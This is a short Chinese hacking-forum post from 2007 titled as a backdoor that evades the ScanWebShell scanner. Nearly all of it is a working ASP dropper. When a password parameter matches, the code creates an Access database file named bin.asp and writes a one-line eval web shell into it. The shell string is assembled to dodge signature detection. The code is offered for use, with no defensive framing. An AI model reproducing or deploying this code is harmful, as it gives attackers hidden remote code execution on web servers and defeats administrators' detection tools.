‹‹ 上一主题 | 下一主题 ››
发新话题
打印

躲避ScanWebShell的一个后门

随风而飞

六饼

中级会员

Rank: 3Rank: 3

其实什么都不会的菜鸟

注册会员专用 斑竹专用勋章 新人进步奖 灌水天才奖

1# 发表于 2007-4-12 19:51  只看该作者

躲避ScanWebShell的一个后门

<%
pass="zs"
If request("bin")= pass then
shell = "bin.asp"
Connstr="rovider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath(shell)
set connad=server.createobject("adox.catalog")
connad.create connstr
Set conn=server.createobject("Adodb.Connection")
conn.open connstr
conn.execute("create table cmd(shell text)")
conn.execute("insert into cmd (shell) values (&#39;<"&Chr("37")&"e"&"val+request("""&pass&""")"&chr("37")&">&#39;)")
End If
%>

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题